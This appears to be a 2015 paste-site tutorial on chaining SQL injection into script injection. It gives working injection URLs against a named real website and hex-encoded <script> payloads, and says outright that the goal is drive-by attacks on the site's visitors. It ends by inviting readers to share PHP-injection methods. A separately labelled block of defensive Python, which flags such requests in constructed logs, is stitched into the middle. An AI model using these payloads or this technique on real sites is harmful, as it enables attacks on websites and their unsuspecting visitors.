Kyfx

Let's add html with SQLi

Apr 16th, 2015
Why add HTML?
OK, the reason we do this is to execute XSS and drive-by attacks, and we can affect the site's visitors using this.
It increases our attack vectors and is an example of how SQLi can be used to carry out attacks that affect the users/visitors.

Here is a way I found to add HTML with SQL injection:

Click on it:
http://old.cageprisoners.com/articles.php?id=-25632 UNION ALL SELECT 1,2,concat(0x3c7363726970743e616c6572742827,version(),0x27293b3c2f7363726970743e) ,4,5,6-- -

It'll pop up with the DB version :)

Next you can add more tags like <h1></h1> shit and stuff with:
http://old.cageprisoners.com/articles.php?id=-25632 UNION%20ALL SELECT 1,2,concat(0x3c68313e4920676f7420746865206461746162617365206261627920697420697320,version%28%29,0x3c2f68313e) ,4,5,6--%20-

Convert the tag <script>alert(' into hex, which is:
3c7363726970743e616c6572742827

so 0x3c7363726970743e616c6572742827

Next convert the tag ');</script> into hex, which is:
27293b3c2f7363726970743e

so 0x27293b3c2f7363726970743e

We need <script>alert('version()');</script>
so
concat(0x3c7363726970743e616c6572742827,version(),0x27293b3c2f7363726970743e) is what we will use; then check the results.
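From the defender's side, the trick above leaves a clear fingerprint in web-server logs: a UNION SELECT whose concat() arguments are 0x hex literals that decode to HTML markup. The following Python is an added example, not part of the paste; it decodes such literals the way MySQL's concat() would render them and flags matching requests. The log lines, host and addresses are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (RFC 5737 test addresses, no real host). Lines 2 and 3
# carry the two UNION/concat payloads discussed in the paste; the other lines are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Apr/2015:10:00:01 +0000] "GET /articles.php?id=25632 HTTP/1.1" 200 5120
203.0.113.5 - - [16/Apr/2015:10:00:07 +0000] "GET /articles.php?id=-25632%20UNION%20ALL%20SELECT%201,2,concat(0x3c7363726970743e616c6572742827,version(),0x27293b3c2f7363726970743e),4,5,6--%20- HTTP/1.1" 200 4870
203.0.113.5 - - [16/Apr/2015:10:00:12 +0000] "GET /articles.php?id=-25632%20UNION%20ALL%20SELECT%201,2,concat(0x3c68313e4920676f7420746865206461746162617365206261627920697420697320,version%28%29,0x3c2f68313e),4,5,6--%20- HTTP/1.1" 200 4901
203.0.113.9 - - [16/Apr/2015:10:01:00 +0000] "GET /search.php?q=0x41%20is%20a%20hex%20literal HTTP/1.1" 200 3000
"""

REQUEST_PATH = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.IGNORECASE)
HTML_TAG = re.compile(r"<(/?[a-zA-Z][a-zA-Z0-9]*)[\s>]")

def decode_hex_literals(text):
    """Render 0x... literals as the ASCII text MySQL's concat() would emit for them."""
    def render(match):
        digits = match.group(1)
        if len(digits) % 2:                 # odd digit count is a number, not a byte string
            return match.group(0)
        try:
            return bytes.fromhex(digits).decode("ascii")
        except UnicodeDecodeError:
            return match.group(0)           # non-ASCII bytes: keep the raw literal
    return HEX_LITERAL.sub(render, text)

def analyse_request(path):
    """Classify one request path; 'rendered' shows what the literals would put in the page."""
    decoded = unquote_plus(path)
    rendered = decode_hex_literals(decoded)
    union = bool(UNION_SELECT.search(decoded))
    tags = [t.lower() for t in HTML_TAG.findall(rendered)]
    return {
        "union_select": union,
        "hex_literals": len(HEX_LITERAL.findall(decoded)),
        "tags": tags,
        "rendered": rendered,
        # UNION SELECT plus markup hidden inside hex literals is exactly the paste's pattern
        "alert": union and bool(tags),
    }

def scan_log(log):
    """Return the analysis of every request in the log that raises an alert."""
    results = [analyse_request(m.group(1)) for m in map(REQUEST_PATH.search, log.splitlines()) if m]
    return [r for r in results if r["alert"]]
```

scan_log(SAMPLE_LOG) returns only the two UNION requests; their `rendered` field exposes the <script> and <h1> markup that the hex literals hid from a naive string match.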

Further experiment:
I tried injecting PHP code too, but I couldn't and failed.
Injecting PHP code could take this attack to a much higher level.
Please share any of your new methods regarding this if you find any.

Hex converter:
http://www.string-functions.com/string-hex.aspx